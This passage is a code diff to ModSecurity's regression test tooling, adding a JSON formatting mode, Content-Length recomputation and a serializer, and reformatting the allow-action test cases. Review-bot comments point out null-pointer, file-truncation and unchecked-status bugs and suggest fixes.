diff --git a/test/common/modsecurity_test.cc b/test/common/modsecurity_test.cc index 21af285d55..23eed49e58 100644 --- a/test/common/modsecurity_test.cc +++ b/test/common/modsecurity_test.cc @@ -68,15 +68,22 @@ bool ModSecurityTest::load_test_json(const std::string &file) { return false; } - size_t num_tests = node->u.array.len; - for ( int i = 0; i < num_tests; i++ ) { - yajl_val obj = node->u.array.values[i]; - - auto u = std::unique_ptr(T::from_yajl_node(obj)); + if (m_format) { + auto u = T::from_yajl_node(node); u->filename = file; - const auto key = u->filename + ":" + u->name; - (*this)[key].push_back(std::move(u)); + (*this)[file].push_back(std::move(u)); + } else { + size_t num_tests = node->u.array.len; + for ( int i = 0; i < num_tests; i++ ) { + yajl_val obj = node->u.array.values[i]; + + auto u = T::from_yajl_node(obj); + u->filename = file; + + const auto key = u->filename + ":" + u->name; + (*this)[key].push_back(std::move(u)); + } } yajl_tree_free(node); @@ -140,6 +147,13 @@ void ModSecurityTest::cmd_options(int argc, char **argv) { i++; m_test_multithreaded = true; } + if (argc > i && strcmp(argv[i], "format") == 0) { + i++; + m_format = true; + } + if (std::getenv("UPDATE_CONTENT_LENGTH")) { + m_update_content_length = true; + } if (std::getenv("AUTOMAKE_TESTS")) { m_automake_output = true; } diff --git a/test/common/modsecurity_test.h b/test/common/modsecurity_test.h index e7a8b1b3e5..6e8a3bbc8f 100644 --- a/test/common/modsecurity_test.h +++ b/test/common/modsecurity_test.h @@ -17,7 +17,7 @@ #include #include #include -#include +#include #ifndef TEST_COMMON_MODSECURITY_TEST_H_ #define TEST_COMMON_MODSECURITY_TEST_H_ 
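Review bot: In the new `if (m_format)` branch of load_test_json, `T::from_yajl_node(node)` receives the whole top-level node, which is only correct when `T` parses an array of tests. `m_format` is a runtime flag that `cmd_options` sets for every instantiation, so a `T` whose parser expects a single object would read `node->u.object` from an array value. The regression runner appears to avoid this by using a separate loader object in format mode, but nothing in this function enforces it. I would add `// format mode: T::from_yajl_node must accept the top-level array (e.g. RegressionTests)` above the branch, or return false when `!YAJL_IS_ARRAY(node)` before either branch runs. load_test_json starts and ends outside this hunk, so an earlier type check may already exist.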
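Review bot: The `std::getenv("UPDATE_CONTENT_LENGTH")` check added to cmd_options treats any value as "on", including an empty string or `0`, and in format mode that flag makes the tool rewrite `Content-Length` headers in the test files on disk. Neither this variable nor the new `format` argument is described anywhere in the hunk. I would add a comment above the two checks such as `// "format" rewrites every loaded test file in place; UPDATE_CONTENT_LENGTH (any value, even empty) also recomputes Content-Length headers`. Because `format` is matched only at the current `argv[i]`, it seems to be recognised only after the preceding options; the rest of cmd_options is outside this hunk, so that ordering should be confirmed and mentioned in the usage text.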
@@ -29,13 +29,9 @@ extern std::string default_test_path; namespace modsecurity_test { template class ModSecurityTest : - public std::unordered_map>> { + public std::map>> { public: - ModSecurityTest() - : m_test_number(0), - m_automake_output(false), - m_count_all(false), - m_test_multithreaded(false) { } + ModSecurityTest() = default; std::string header(); void cmd_options(int, char **); @@ -44,12 +40,14 @@ template class ModSecurityTest : bool load_test_json(const std::string &file); std::string target; - bool verbose = false; - bool color = false; - int m_test_number; - bool m_automake_output; - bool m_count_all; - bool m_test_multithreaded; + bool verbose{false}; + bool color{false}; + int m_test_number{0}; + bool m_automake_output{false}; + bool m_count_all{false}; + bool m_test_multithreaded{false}; + bool m_format{false}; + bool m_update_content_length{false}; }; } // namespace modsecurity_test diff --git a/test/common/modsecurity_test_results.h b/test/common/modsecurity_test_results.h index a786fd19f8..15e3b223ed 100644 --- a/test/common/modsecurity_test_results.h +++ b/test/common/modsecurity_test_results.h @@ -14,7 +14,6 @@ */ #include -#include #include #include diff --git a/test/regression/regression.cc b/test/regression/regression.cc index ba37f76dfb..5b1ca514e8 100644 --- a/test/regression/regression.cc +++ b/test/regression/regression.cc @@ -41,6 +41,7 @@ using modsecurity_test::CustomDebugLog; using modsecurity_test::ModSecurityTest; using modsecurity_test::ModSecurityTestResults; using modsecurity_test::RegressionTest; +using modsecurity_test::RegressionTests; using modsecurity_test::RegressionTestResult; using modsecurity::Utils::regex_search; 
@@ -436,6 +437,35 @@ int main(int argc, char **argv) return 0; #else test.cmd_options(argc, argv); + + if (test.m_format) { +#ifdef WITH_YAJL + std::cout << "start formatting test case JSON files" << std::endl; + ModSecurityTest test2; + test2.cmd_options(argc, argv); + test2.load_tests(); + for (const auto &[name, tests] : test2) { + std::ofstream ofs{name}; + if (!ofs.is_open()) { + std::cerr << "cannot open " << name << " for writing." << std::endl; + return 1; + } + if (test2.m_update_content_length) { + tests[0]->update_content_lengths(); + } + ofs << tests[0]->toJSON(); + ofs.close(); + std::cout << "written formatted JSON to " << name << std::endl; + } + std::cout << "finished formatting files." << std::endl; + return 0; +#else + std::cout << "Test utility cannot format test case JSON files without being built with YAJL." \ + << std::endl; + return 1; +#endif + } + if (!test.m_automake_output && !test.m_count_all) { std::cout << test.header(); } diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index 01ad2aacc9..18f61b64dc 100644 --- a/test/regression/regression_test.cc +++ b/test/regression/regression_test.cc @@ -20,6 +20,12 @@ #include #include #include +#include +#include + +#ifdef WITH_YAJL +#include +#endif namespace modsecurity_test { @@ -48,7 +54,7 @@ inline std::string RegressionTest::yajl_array_to_str(const yajl_val &node) { for (int z = 0; z < node->u.array.len; z++) { yajl_val val3 = node->u.array.values[z]; const char *key = YAJL_GET_STRING(val3); - i << key << "\n"; + i << key; } return i.str(); } 
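Review bot: The format loop in main opens `std::ofstream ofs{name}` on the input file before calling `toJSON()`, so the original test file is already truncated if serialisation fails, and `toJSON()` returns an empty string when `yajl_gen_alloc` fails. The stream state is also never checked after `ofs << ...`, so a failed or short write is still reported as "written formatted JSON". Serialise first, refuse to write an empty result, and check the stream after closing, as sketched below. `tests[0]` relies on load_test_json pushing exactly one entry per file in format mode. main starts and ends outside this hunk.

```cpp
        for (const auto &[name, tests] : test2) {
            // … unchanged: optional update_content_lengths() call …

            // Serialise before opening the file so a generator failure cannot truncate it.
            const std::string json = tests[0]->toJSON();
            if (json.empty()) {
                std::cerr << "cannot serialise " << name << "; file left unchanged." << std::endl;
                return 1;
            }
            std::ofstream ofs{name};
            // … unchanged: is_open() check and error return …
            ofs << json;
            ofs.close();
            if (ofs.fail()) {
                std::cerr << "writing " << name << " failed." << std::endl;
                return 1;
            }
            // … unchanged: "written formatted JSON" message …
        }
```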
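Review bot: In yajl_array_to_str, `YAJL_GET_STRING(val3)` yields a null pointer for any array element that is not a JSON string, and the rewritten `i << key;` streams it unchecked, which is undefined behaviour for a `const char *`; guard it with `if (key != nullptr) { i << key; }`. Dropping the `"\n"` also means body arrays are now concatenated with no separator, so each element must carry its own line ending. The multipart bodies visible as context in action-ctl_request_body_access.json have none, which suggests those requests may no longer reach the engine as multi-line bodies; this is worth confirming against the affected tests. A comment above the loop such as `// elements are joined verbatim; test data must include \r\n where a line break is intended` would record the new contract. The function starts outside this hunk.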
@@ -79,137 +85,57 @@ inline std::vector> return vec; } +static inline void set_int_from_yajl(int &dest, std::string_view want_key, std::string_view key, const yajl_val &val) { + if (key == want_key) { + dest = YAJL_GET_INTEGER(val); + } +} + +static inline void set_opt_int_from_yajl(std::optional &dest, std::string_view want_key, std::string_view key, const yajl_val &val) { + if (key == want_key) { + dest = YAJL_GET_INTEGER(val); + } +} + +static inline void set_string_from_yajl(std::string &dest, std::string_view want_key, std::string_view key, const yajl_val &val) { + if (key == want_key) { + dest = YAJL_GET_STRING(val); + } +} -RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { +std::unique_ptr RegressionTest::from_yajl_node(const yajl_val &node) { size_t nelem = node->u.object.len; - RegressionTest *u = new RegressionTest(); + auto u = std::make_unique(); u->http_code = 200; for (int i = 0; i < nelem; i++) { const char *key = node->u.object.keys[ i ]; yajl_val val = node->u.object.values[ i ]; - if (strcmp(key, "enabled") == 0) { - u->enabled = YAJL_GET_INTEGER(val); - } - if (strcmp(key, "version_min") == 0) { - u->version_min = YAJL_GET_INTEGER(val); - } - if (strcmp(key, "version_max") == 0) { - u->version_max = YAJL_GET_INTEGER(val); - } - if (strcmp(key, "title") == 0) { - u->title = YAJL_GET_STRING(val); - } - if (strcmp(key, "url") == 0) { - u->url = YAJL_GET_STRING(val); - } - if (strcmp(key, "resource") == 0) { - u->resource = YAJL_GET_STRING(val); - } - if (strcmp(key, "github_issue") == 0) { - u->github_issue = YAJL_GET_INTEGER(val); - } + set_int_from_yajl(u->enabled, "enabled", key, val); + set_int_from_yajl(u->version_min, "version_min", key, val); + set_opt_int_from_yajl(u->version_max, "version_max", key, val); + set_string_from_yajl(u->title, "title", key, val); + set_string_from_yajl(u->url, "url", key, val); + set_string_from_yajl(u->resource, "resource", key, val); + set_opt_int_from_yajl(u->github_issue, "github_issue", 
key, val); if (strcmp(key, "client") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "ip") == 0) { - u->clientIp = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "port") == 0) { - u->clientPort = YAJL_GET_INTEGER(val2); - } - } + u->update_client_from_yajl_node(val); } if (strcmp(key, "server") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "ip") == 0) { - u->serverIp = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "port") == 0) { - u->serverPort = YAJL_GET_INTEGER(val2); - } - if (strcmp(key2, "hostname") == 0) { - u->hostname = YAJL_GET_STRING(val2); - } - } + u->update_server_from_yajl_node(val); } if (strcmp(key, "request") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "uri") == 0) { - u->uri = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "method") == 0) { - u->method = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "http_version") == 0) { - u->httpVersion = YAJL_GET_NUMBER(val2); - } - if (strcmp(key2, "headers") == 0) { - u->request_headers = yajl_array_to_map(val2); - } - if (strcmp(key2, "body") == 0) { - u->request_body = yajl_array_to_str(val2); - } - } + u->update_request_from_yajl_node(val); } if (strcmp(key, "response") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "headers") == 0) { - u->response_headers = yajl_array_to_map(val2); - } - if (strcmp(key2, "body") == 0) { - u->response_body = yajl_array_to_str(val2); - } - if (strcmp(key2, "protocol") == 0) { - u->response_protocol = YAJL_GET_STRING(val2); - } - } + u->update_response_from_yajl_node(val); } if (strcmp(key, "expected") == 0) { - 
for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "audit_log") == 0) { - u->audit_log = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "debug_log") == 0) { - u->debug_log = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "error_log") == 0) { - u->error_log = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "http_code") == 0) { - u->http_code = YAJL_GET_INTEGER(val2); - } - if (strcmp(key2, "redirect_url") == 0) { - u->redirect_url = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "parser_error") == 0) { - u->parser_error = YAJL_GET_STRING(val2); - } - } + u->update_expected_from_yajl_node(val); } if (strcmp(key, "rules") == 0) { - std::stringstream si; - for (int j = 0; j < val->u.array.len; j++) { - yajl_val val2 = val->u.array.values[ j ]; - const char *keyj = YAJL_GET_STRING(val2); - si << keyj << "\n"; - } - u->rules = si.str(); + u->update_rules_from_yajl_node(val); } } 
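Review bot: The new `set_string_from_yajl` helper assigns `YAJL_GET_STRING(val)` straight into a `std::string`, and that macro evaluates to a null pointer when the value is not a JSON string, so a test file with, say, a numeric `title` makes the assignment undefined behaviour. The integer helpers have the quieter version of the same problem: `YAJL_GET_INTEGER` yields 0 for a non-integer, which overwrites the field and engages the `std::optional` with a value the file never contained. Since the helpers now centralise every scalar read, the type check belongs in them: `if (key == want_key && YAJL_IS_STRING(val)) {` for strings and `if (key == want_key && YAJL_IS_INTEGER(val)) {` for both integer helpers. The loop in from_yajl_node also compares `int i` against `size_t nelem`; `for (size_t i = 0; i < nelem; i++)` removes the sign mismatch. The closing lines of from_yajl_node are outside this hunk.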
@@ -218,4 +144,312 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { return u; } +void RegressionTest::update_client_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + set_string_from_yajl(clientIp, "ip", key2, val2); + set_int_from_yajl(clientPort, "port", key2, val2); + } +} + +void RegressionTest::update_server_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + set_string_from_yajl(serverIp, "ip", key2, val2); + set_int_from_yajl(serverPort, "port", key2, val2); + set_string_from_yajl(hostname, "hostname", key2, val2); + } +} + +void RegressionTest::update_request_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + set_string_from_yajl(uri, "uri", key2, val2); + set_string_from_yajl(method, "method", key2, val2); + if (strcmp(key2, "http_version") == 0) { + httpVersion = YAJL_GET_NUMBER(val2); + } + if (strcmp(key2, "headers") == 0) { + request_headers = yajl_array_to_map(val2); + } + if (strcmp(key2, "body") == 0) { + request_body = yajl_array_to_str(val2); + request_body_lines = yajl_array_to_vec_str(val2); + } + } +} + +void RegressionTest::update_response_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + if (strcmp(key2, "headers") == 0) { + response_headers = yajl_array_to_map(val2); + } + if (strcmp(key2, "body") == 0) { + response_body = yajl_array_to_str(val2); + response_body_lines = yajl_array_to_vec_str(val2); + } + set_string_from_yajl(response_protocol, "protocol", key2, val2); + } +} + +void 
RegressionTest::update_expected_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + set_string_from_yajl(audit_log, "audit_log", key2, val2); + set_string_from_yajl(debug_log, "debug_log", key2, val2); + set_string_from_yajl(error_log, "error_log", key2, val2); + set_int_from_yajl(http_code, "http_code", key2, val2); + set_string_from_yajl(redirect_url, "redirect_url", key2, val2); + set_string_from_yajl(parser_error, "parser_error", key2, val2); + } +} + +void RegressionTest::update_rules_from_yajl_node(const yajl_val &val) { + std::stringstream si; + for (int j = 0; j < val->u.array.len; j++) { + yajl_val val2 = val->u.array.values[ j ]; + const char *keyj = YAJL_GET_STRING(val2); + si << keyj << "\n"; + } + rules = si.str(); + rules_lines = yajl_array_to_vec_str(val); +} + + +constexpr char ascii_tolower(char c) { + return 'A' <= c && c <= 'Z' ? (c + ('a' - 'A')) : c; +} + +bool iequals_ascii(std::string_view a, std::string_view b) { + return a.size() == b.size() && + std::equal(a.begin(), a.end(), b.begin(), b.end(), + [](char x, char y) { + return ascii_tolower(x) == ascii_tolower(y); + }); +} + +static bool has_chunked_header(const std::vector> &headers) { + return std::any_of(std::begin(headers), std::end(headers), + [](const auto &header) { + const auto &[name, value]{header}; + return iequals_ascii(name, "Transfer-Encoding") && iequals_ascii(value, "chunked"); + }); +} + +static void update_content_length(std::vector> &headers, size_t length) { + if (has_chunked_header(headers)) { + return; + } + + bool has_content_length = false; + for (auto &[name, value] : headers) { + if (iequals_ascii(name, "Content-Length")) { + value = std::to_string(length); + has_content_length = true; + } + } + if (!has_content_length) { + headers.emplace_back(std::pair{"Content-Length", std::to_string(length)}); + } +} + +void 
RegressionTest::update_content_lengths() { + update_content_length(request_headers, request_body.size()); + update_content_length(response_headers, response_body.size()); +} + +std::unique_ptr RegressionTests::from_yajl_node(const yajl_val &node) { + auto u = std::make_unique(); + size_t num_tests = node->u.array.len; + for (int i = 0; i < num_tests; i++) { + yajl_val obj = node->u.array.values[i]; + u->tests.emplace_back(std::move(RegressionTest::from_yajl_node(obj))); + } + return u; +} + +void RegressionTests::update_content_lengths() { + for (auto & test : tests) { + test->update_content_lengths(); + } +} + +#ifdef WITH_YAJL + +static yajl_gen_status gen_string_view(yajl_gen g, std::string_view s) { + return yajl_gen_string(g, reinterpret_cast(s.data()), s.length()); +} + +static yajl_gen_status gen_key_str(yajl_gen g, std::string_view key, std::string_view val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + return gen_string_view(g, val); +} + +static yajl_gen_status gen_key_str_if_non_empty(yajl_gen g, std::string_view key, std::string_view val) { + if (val.empty()) { + return yajl_gen_status_ok; + } + return gen_key_str(g, key, val); +} + +static yajl_gen_status gen_key_int(yajl_gen g, std::string_view key, int val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + return yajl_gen_integer(g, val); +} + +static yajl_gen_status gen_key_opt_int(yajl_gen g, std::string_view key, std::optional val) { + if (!val.has_value()) { + return yajl_gen_status_ok; + } + return gen_key_int(g, key, val.value()); +} + +static yajl_gen_status gen_key_int_if_non_zero(yajl_gen g, std::string_view key, int val) { + if (val == 0) { + return yajl_gen_status_ok; + } + return gen_key_int(g, key, val); +} + +static yajl_gen_status gen_key_number(yajl_gen g, std::string_view key, std::string_view raw_val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + return 
yajl_gen_number(g, reinterpret_cast(raw_val.data()), raw_val.length()); +} + +static yajl_gen_status gen_key_str_array(yajl_gen g, std::string_view key, const std::vector &lines) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + if (auto s{yajl_gen_array_open(g)}; s != yajl_gen_status_ok) { + return s; + } + for (const auto &line : lines) { + if (auto s{gen_string_view(g, line)}; s != yajl_gen_status_ok) { + return s; + } + } + return yajl_gen_array_close(g); +} + +static yajl_gen_status gen_key_headers(yajl_gen g, std::string_view key, const std::vector> &headers) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + if (auto s{yajl_gen_map_open(g)}; s != yajl_gen_status_ok) { + return s; + } + for (const auto &[name, value] : headers) { + if (auto s{gen_key_str(g, name, value)}; s != yajl_gen_status_ok) { + return s; + } + } + return yajl_gen_map_close(g); +} + +std::string RegressionTests::toJSON() const { + const unsigned char *buf; + size_t len; + yajl_gen g; + + g = yajl_gen_alloc(NULL); + if (g == NULL) { + return ""; + } + yajl_gen_config(g, yajl_gen_beautify, 1); + yajl_gen_config(g, yajl_gen_indent_string, " "); + + yajl_gen_array_open(g); + for (const auto &t : tests) { + yajl_gen_map_open(g); + gen_key_int(g, "enabled", t->enabled); + gen_key_int(g, "version_min", t->version_min); + gen_key_opt_int(g, "version_max", t->version_max); + gen_key_str(g, "title", t->title); + gen_key_str_if_non_empty(g, "url", t->url); + gen_key_str_if_non_empty(g, "resource", t->resource); + gen_key_opt_int(g, "github_issue", t->github_issue); + + gen_string_view(g, "client"); + yajl_gen_map_open(g); + gen_key_str(g, "ip", t->clientIp); + gen_key_int(g, "port", t->clientPort); + yajl_gen_map_close(g); + + gen_string_view(g, "server"); + yajl_gen_map_open(g); + gen_key_str(g, "ip", t->serverIp); + gen_key_int(g, "port", t->serverPort); + yajl_gen_map_close(g); + + gen_string_view(g, "request"); + 
yajl_gen_map_open(g); + gen_key_headers(g, "headers", t->request_headers); + gen_key_str(g, "uri", t->uri); + gen_key_str(g, "method", t->method); + if (!t->httpVersion.empty()) { + gen_key_number(g, "http_version", t->httpVersion); + } + + auto request_body_lines{t->request_body_lines}; + if (request_body_lines.empty()) { + request_body_lines.emplace_back(""); + } + gen_key_str_array(g, "body", request_body_lines); + + yajl_gen_map_close(g); + + gen_string_view(g, "response"); + yajl_gen_map_open(g); + gen_key_headers(g, "headers", t->response_headers); + + auto response_body_lines{t->response_body_lines}; + if (response_body_lines.empty()) { + response_body_lines.emplace_back(""); + } + gen_key_str_array(g, "body", response_body_lines); + + gen_key_str_if_non_empty(g, "protocol", t->response_protocol); + yajl_gen_map_close(g); + + gen_string_view(g, "expected"); + yajl_gen_map_open(g); + gen_key_str_if_non_empty(g, "audit_log", t->audit_log); + gen_key_str_if_non_empty(g, "debug_log", t->debug_log); + gen_key_str_if_non_empty(g, "error_log", t->error_log); + gen_key_int(g, "http_code", t->http_code); + gen_key_str_if_non_empty(g, "redirect_url", t->redirect_url); + gen_key_str_if_non_empty(g, "parser_error", t->parser_error); + yajl_gen_map_close(g); + + gen_key_str_array(g, "rules", t->rules_lines); + + yajl_gen_map_close(g); + } + yajl_gen_array_close(g); + + yajl_gen_get_buf(g, &buf, &len); + std::string s{reinterpret_cast(buf), len}; + yajl_gen_free(g); + return s; +} + +#endif // WITH_YAJL + } // namespace modsecurity_test diff --git a/test/regression/regression_test.h b/test/regression/regression_test.h index eb37986723..0271482f96 100644 --- a/test/regression/regression_test.h +++ b/test/regression/regression_test.h @@ -17,11 +17,12 @@ #include #include -#include #include #include #include #include +#include +#include #ifndef TEST_REGRESSION_REGRESSION_TEST_H_ #define TEST_REGRESSION_REGRESSION_TEST_H_ 
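Review bot: `RegressionTests::toJSON()` discards the `yajl_gen_status` of every generator call, even though the `gen_key_*` helpers above it propagate one, so a failed call produces truncated or malformed JSON that is returned as if it were valid. Because the caller in regression.cc writes this string over the original test file, a partial document would replace the test data. Track the first failure and return an empty string in that case, matching the existing `yajl_gen_alloc` failure path; a sketch follows. Separately, `ascii_tolower` and `iequals_ascii` are the only helpers in this hunk without `static`, and the `std::move` around `RegressionTest::from_yajl_node(obj)` is redundant on a temporary.

```cpp
    yajl_gen_status first_error = yajl_gen_status_ok;
    // Remember the first failing generator call; later calls still run but the result is discarded.
    const auto track = [&first_error](yajl_gen_status s) {
        if (first_error == yajl_gen_status_ok) {
            first_error = s;
        }
    };

    track(yajl_gen_array_open(g));
    for (const auto &t : tests) {
        track(yajl_gen_map_open(g));
        track(gen_key_int(g, "enabled", t->enabled));
        // … unchanged: remaining fields and sub-maps, each call wrapped in track(...) …
        track(yajl_gen_map_close(g));
    }
    track(yajl_gen_array_close(g));

    track(yajl_gen_get_buf(g, &buf, &len));
    std::string s;
    if (first_error == yajl_gen_status_ok) {
        s.assign(reinterpret_cast<const char *>(buf), len);
    }
    yajl_gen_free(g);
    return s;
```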
@@ -31,7 +32,7 @@ namespace modsecurity_test { class RegressionTest { public: - static RegressionTest *from_yajl_node(const yajl_val &); + static std::unique_ptr from_yajl_node(const yajl_val &); static std::string print(); std::string filename; @@ -43,8 +44,8 @@ class RegressionTest { std::string url; int enabled; int version_min; - int version_max; - int github_issue; + std::optional version_max; + std::optional github_issue; std::vector> request_headers; std::vector> response_headers; @@ -76,8 +77,34 @@ class RegressionTest { int http_code; std::string redirect_url; + + // fields for formatting JSON + + std::vector request_body_lines; + std::vector response_body_lines; + std::vector rules_lines; + void update_content_lengths(); + +private: + void update_client_from_yajl_node(const yajl_val &val); + void update_server_from_yajl_node(const yajl_val &val); + void update_request_from_yajl_node(const yajl_val &val); + void update_response_from_yajl_node(const yajl_val &val); + void update_expected_from_yajl_node(const yajl_val &val); + void update_rules_from_yajl_node(const yajl_val &val); }; +class RegressionTests { + public: + static std::unique_ptr from_yajl_node(const yajl_val &); + void update_content_lengths(); + std::string toJSON() const; + + std::string filename; + std::string name; + + std::vector> tests; +}; class RegressionTestResult { public: diff --git a/test/test-cases/regression/action-allow.json b/test/test-cases/regression/action-allow.json index 357d451bca..c0ae4603d4 100644 --- a/test/test-cases/regression/action-allow.json +++ b/test/test-cases/regression/action-allow.json 
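Review bot: `int enabled;` and `int version_min;`, visible as context beside the new `std::optional` members in the second hunk of this header, still have no initialiser, while the new `toJSON()` emits both unconditionally. Whether they start at zero therefore depends on how the object is constructed, and a default-initialised `RegressionTest` whose JSON omits either key would have an indeterminate value written back to the test file. Give them in-class defaults in the style this commit already applies to `ModSecurityTest`, e.g. `int enabled{0};` and `int version_min{0};`. The port members serialised by `toJSON()` are declared outside these hunks and may need the same treatment.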
@@ -1,98 +1,132 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (1/3)", - "expected":{ - "debug_log": "Skipped rule id 'action-allow.json:3' as request trough the utilization of an `allow' action", - "http_code": 200 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ + "expected": { + "debug_log": "Skipped rule id 'action-allow.json:3' as request trough the utilization of an `allow' action", + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow,msg:'ALLOWED',id:500065\"", "SecAction \"phase:1,deny,msg:'DENIED',id:500066\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (2/3)", - "expected":{ - "debug_log": "", - "http_code": 500 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet 
little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 500 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow:request,msg:'ALLOWED',id:500065\"", "SecRule ARGS \"@contains value\" \"id:1,t:trim,status:500,deny,phase:3\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (3/3)", - "expected":{ - "debug_log": "", - "http_code": 500 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 500 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction 
\"phase:1,allow:phase,msg:'ALLOWED',id:500065\"", "SecRule ARGS \"@contains value\" \"id:1,t:trim,status:500,deny,phase:3\"" diff --git a/test/test-cases/regression/action-block.json b/test/test-cases/regression/action-block.json index 239df02715..917d985581 100644 --- a/test/test-cases/regression/action-block.json +++ b/test/test-cases/regression/action-block.json 
